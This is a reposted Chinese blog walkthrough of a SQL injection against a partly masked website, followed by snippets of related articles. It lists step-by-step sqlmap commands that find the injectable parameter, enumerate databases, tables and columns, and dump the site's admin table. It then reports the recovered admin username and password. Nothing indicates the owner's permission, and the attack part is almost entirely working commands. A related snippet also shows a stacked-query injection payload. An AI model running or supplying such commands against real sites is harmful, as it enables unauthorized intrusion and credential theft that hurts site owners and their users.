记一次简单的sql注入

最新推荐文章于 2024-07-22 22:02:34 发布
最新推荐文章于 2024-07-22 22:02:34 发布
阅读量102 收藏
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/lanyincao/p/10358133.html
版权

         什么是sql注入攻击?  所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。

         1.判断注入点是否有效

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59"

 

         

2,查找数据库

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --dbs

 

爆出数据库名了, uxRaMeqAZwAyvZqJXiZP

 

3,通过1中的数据库查找对应的表

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --tables -D "uxRaMeqAZwAyvZqJXiZP"

 

 

 4,通过2中的数据表得到字段

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --columns -D "uxRaMeqAZwAyvZqJXiZP" -T "admin"

 4,通过3得到字段值,即账号密码

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --dump -D "uxRaMeqAZwAyvZqJXiZP" -T "admin" -C "admin_name,admin_pass"

 

登陆账号密码为admin,qiju

 

好了,本来我还想找登陆后台的,但找不到,我就不截图了。

 

 

 

 

        

转载于:https://www.cnblogs.com/lanyincao/p/10358133.html

weixin_30550081
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一次系统被sql注入搞挂的惨痛经历
lisu061714112的专栏
04-22 2775
前言 最近我在整理安全漏洞相关问题,准备在公司做一次分享。恰好,这段时间团队发现了一个sql注入漏洞:在一个公共的分页功能中,排序字段作为入参,前端页面可以自定义。在分页sql的mybatis mapper.xml中,order by字段后面使用$符号动态接收计算后的排序参数,这样可以实现动态排序的功能。 但是,如果入参传入: id; select 1 -- 最终执行的sql会变成: select * from user order by id; select 1 -- limit 1,20 –会把后面
一次成功的sql注入入侵检测附带sql性能优化
09-11
SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL代码,以获取未授权的数据或控制数据库服务器。描述中提到的问题表明,开发者早期可能忽视了对用户输入的严格验证,导致了SQL注入漏洞的存在...
一次入门难度的SQL注入与密码破解
ZL_1618的博客
01-02 970
技术流程没什么可总结,该写的都在上面,我们来谈几点安全行业的问题首先,不要信任用户的输入,用户的输入有时候,可能会对系统造成危害,就像我们的注入语句。很多时候,我们会通过禁止输入诸如空格,分号,引号之类的字符来实施管控,但对应的也有屏蔽这些管控机制的方法,这样来回的防御与攻击就是SQL安全领域所研究的课题其次,用户的安全意识。
漏洞挖掘 | 一次伪静态页面的SQL注入
2301_80127209的博客
06-11 457
在尝试sql注入的时候,往往过分关注get传参或者post传参而忽略了URL中自带的注入点,有时候一些明显的数字型参数也能够带入payload多尝试,多总结祝各位师兄们也都收获满满~~!申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨守法。免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶。
渗透测试|一次SQL注入新用法
weixin_45840241的博客
06-01 751
在参加某市攻防演练的时候,发现目标站,经过一系列尝试,包括弱口令、SQL注入等等尝试后,未获得到有效的入口点。在准备放弃之时,看到页脚的banner:xxxxx信息科技有限公司然后有了个想法,到fofa里面搜这个banner,找到一些其他使用该站的,但是没有参与攻防演练的(PS:演练前该单位做过整改弱口令全改了)。
干货!一次伪静态页面的SQL注入!白帽黑客实战 。
m0_60571990的博客
11-22 778
干货!一次伪静态页面的SQL注入!白帽黑客实战 。
从0到1深入浅出学习SQL注入
Python_0011的博客
03-01 829
叒有一段时间没写文章了,正好周末有时间就来写写,本文来讲讲有关SQL注入相关的知识点会尽可能详细的写出来,比较适合刚入门安全的小白进行学习,希望能在面试或实战中助你一臂之力。如有大佬发现文中内容有错误的地方恳请斧正!也欢迎各位师傅共同交流学习技术!
浅谈一次sql注入 & webshell 的美丽“邂逅”
09-09
SQL注入是一种常见的网络安全漏洞,发生在应用程序未能充分验证或清理用户输入的数据时。当攻击者能够将恶意的SQL代码注入到查询中,他们可以获取敏感信息、修改数据库内容甚至完全控制数据库服务器。在上述案例中,...
使用Python防止SQL注入攻击的实现示例
09-16
开放式Web应用程序安全项目(OWASP)每几年都会发布一次关于Web应用程序最常见安全风险的报告,其中SQL注入攻击一直位居前列。SQL注入不仅常见,而且危害巨大,能够导致数据泄露、破坏或被篡改等严重后果。鉴于...
实例讲解SQL注入攻击
02-26
SQL注入”是一种利用未过滤/未审核用户输入的攻击方法(“缓存溢出”和这个不同),意思就是让应用运行本不应该运行的SQL代码。如果应用毫无防备地创建了SQL字符串并且运行了它们,就会造成一些出人意料的结果。本...
一次SQL注入
weixin_70770389的博客
03-24 153
小白初试
一文带你快速回忆SQL注入
最新发布
carrot11223的博客
07-22 638
SQL 注入是一种常见的网络攻击手段,攻击者通过在用户输入中插入恶意的 SQL 代码,从而控制或破坏目标数据库。通常,这种漏洞存在于应用程序对用户输入未进行充分过滤和处理的情况下。
一次SRC实战-SQL注入
YINGXXX123的博客
01-28 756
前端输入字段,后端会运行SQL语句返回数据。数据库大都是支持SQL语言的,SQL语言本身是有预留关键字的,比如常用的select、update、delete等。故意输入非正常的SQL查询语句,由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,没有执行相关验证,用户可以提交一段非法的数据库查询语句,根据程序返回的结果,获得某些他想得知的数据,轻者程序错误,代码泄露,重者直接暴库,甚至危及服务器整体安全,这就是SQL注入攻击。
一次lmxcms审计sql注入到rce审计全过程
weixin_64683116的博客
02-12 1045
欢迎各位师傅关注我的个人公众号: Gat4by前言:马上过年了就要忙起来了,后面大年初一初二可能没时间玩电脑了,趁着这几天手感火热,审一审比较著名的梦想cms。项目源码: http://www.lmxcms.com/down/安装好了这个cms后台进去长这样,看着这界面写的挺糙的,一眼满是漏洞的感觉,今天来审计练习一下RCE漏洞。我审计PHP的CMS的RCE的思路就是先去找是否有eval()函数的存在,先来一手全局查找eval()函数,接着我们锁定eval()函数中是变量而不是预定义常量的。于是来到一处ev
一次艰难的SQL注入(过安全狗)
白帽子凯哥聊黑客
05-29 1291
实战注入的难度比靶场大得多,各种绕过,各种骚操作。要学会利用搜索工具,更要学会选择性放弃。当一条路走不通就换另一种方法,也许就会柳暗花明又一村。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取。
一次对某网站的sql注入
weixin_67503304的博客
09-16 3624
讲解了一次基本sql注入的实战讲解,针对某省某网站的实战测试,本测试仅用于演示。
一次SQL注入漏洞学习
weixin_48017707的博客
09-23 279
文章目录前言一、SQL注入是什么?二、数据库1.数据库相关表2.数据库的操作三、SQL注入分类1、依据注入点类型分类:2、搜索型注入3、依据获取信息的方式分类:四、判断是否存在SQL注入1、手工查询1.1、在URL后面添加 and 1 = 1、and 1 = 2查看页面是否一样,如果不一样则存在SQL注入漏洞1.2先加单引号 '、双引号 "、单括号 )、双括号 ))等看看是否报错,如果报错就可能存在SQL注入漏洞了。2、工具查询五、SQL注入测式(Boolean盲注)1、数据库类型判断2、判断当前数据库名3
利用SQL注入漏洞登录后台
weixin_33787529的博客
04-17 4432
2019独角兽企业重金招聘Python工程师标准>>> ...
一次sql注入实践
程序男的专栏
03-01 524
今天开发代码的时候发现自己的sql全是拼接的,不是where a = ?的那种,细思恐极啊,于是进行了一场sql注入实践。虽然失败了,但是还是得出了一些宝贵的经验。 首先从一个基础的分页查询语句开始分析: Select r.a,r.b  from role r where r.name like ‘role%’  order by r.create_time desc liimit 0,10;说明...
SQL注入详解:执行系统命令与渗透测试
二阶注入是指攻击者通过一次注入攻击在数据库中留下恶意数据,然后在后续的查询中触发这些数据,造成第二次的注入攻击。 总结 SQL注入是Web应用程序安全的重要问题,需要开发者在设计和实现时采取预防措施,如参数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值